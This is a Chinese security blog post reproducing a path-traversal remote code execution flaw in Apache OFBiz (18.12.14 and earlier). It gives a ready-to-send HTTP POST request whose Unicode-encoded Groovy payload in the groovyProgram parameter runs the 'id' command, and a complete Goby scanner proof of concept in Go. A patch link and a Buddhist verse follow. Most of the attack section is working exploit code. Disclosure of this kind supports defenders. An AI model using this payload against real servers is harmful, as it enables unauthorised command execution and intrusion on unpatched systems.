导言
PART
漏洞描述
漏洞复现
漏洞URL:/webtools/control/forgotPassword/%2e/%2e/ProgramExport
漏洞参数:groovyProgram
影响版本:Apache OFBiz <=18.12.14
漏洞详情:
1、打开自己的服务
2、使用以下poc进行检查,groovyProgram进行了Unicode编码
POST /webtools/control/forgotPassword/%2e/%2e/ProgramExport HTTP/1.1Host: 127.0.0.1:8443Cookie:User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Content-Type: application/x-www-form-urlencodedContent-Length: 260groovyProgram=u0074u0068u0072u006fu0077u0020u006eu0065u0077u0020u0045u0078u0063u0065u0070u0074u0069u006fu006eu0028u0027u0069u0064u0027u002eu0065u0078u0065u0063u0075u0074u0065u0028u0029u002eu0074u0065u0078u0074u0029u003b
执行id命令
执行ifconfig
Goby-POC
package exploitsimport ("git.gobies.org/goby/goscanner/goutils")func init() {expJson := `{"Name": "Apache OFBiz 路径遍历导致RCE","Description": "","Product": "","Homepage": "","DisclosureDate": "2024-06-05","PostTime": "2024-06-05","Author": "[email protected]","FofaQuery": "app="Apache_OFBiz"","GobyQuery": "app="Apache_OFBiz"","Level": "3","Impact": "","Recommendation": "","References": [],"Is0day": false,"HasExp": false,"ExpParams": [],"ExpTips": {"Type": "","Content": ""},"ScanSteps": ["AND",{"Request": {"method": "POST","uri": "/webtools/control/forgotPassword/%2e/%2e/ProgramExport","follow_redirect": true,"header": {},"data_type": "text","data": "groovyProgram=\u0074\u0068\u0072\u006f\u0077\u0020\u006e\u0065\u0077\u0020\u0045\u0078\u0063\u0065\u0070\u0074\u0069\u006f\u006e\u0028\u0027\u0069\u0064\u0027\u002e\u0065\u0078\u0065\u0063\u0075\u0074\u0065\u0028\u0029\u002e\u0074\u0065\u0078\u0074\u0029\u003b"},"ResponseTest": {"type": "group","operation": "AND","checks": [{"type": "item","variable": "$code","operation": "==","value": "200","bz": ""},{"type": "item","variable": "$body","operation": "contains","value": "java.lang.Exception","bz": ""}]},"SetVariable": []}],"ExploitSteps": ["AND",{"Request": {"method": "GET","uri": "/test.php","follow_redirect": true,"header": {},"data_type": "text","data": ""},"ResponseTest": {"type": "group","operation": "AND","checks": [{"type": "item","variable": "$code","operation": "==","value": "200","bz": ""},{"type": "item","variable": "$body","operation": "contains","value": "test","bz": ""}]},"SetVariable": []}],"Tags": [],"VulType": [],"CVEIDs": [""],"CNNVD": [""],"CNVD": [""],"CVSSScore": "","Translation": {"CN": {"Name": "Apache OFBiz 路径遍历导致RCE","Product": "","Description": "","Recommendation": "","Impact": "","VulType": [],"Tags": []},"EN": {"Name": "Apache OFBiz 路径遍历导致RCE","Product": "","Description": "","Recommendation": "","Impact": "","VulType": [],"Tags": []}},"AttackSurfaces": {"Application": null,"Support": null,"Service": null,"System": null,"Hardware": null},"PocGlobalParams": {},"ExpGlobalParams": {}}`ExpManager.AddExploit(NewExploit(goutils.GetFileName(),expJson,nil,nil,))}
修复建议
安装升级补丁:
https://issues.apache.org/jira/browse/OFBIZ-13092
个人星球,欢迎加入
阿弥陀佛身金色,相好光明无等伦
白毫宛转五须弥,绀目澄清四大海
光中化佛无数亿,化菩萨众亦无边
四十八愿度众生,九品咸令登彼岸
——The End—
原文始发于微信公众号(小羊安全屋):【命令执行】Apache OFBi路径遍历
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论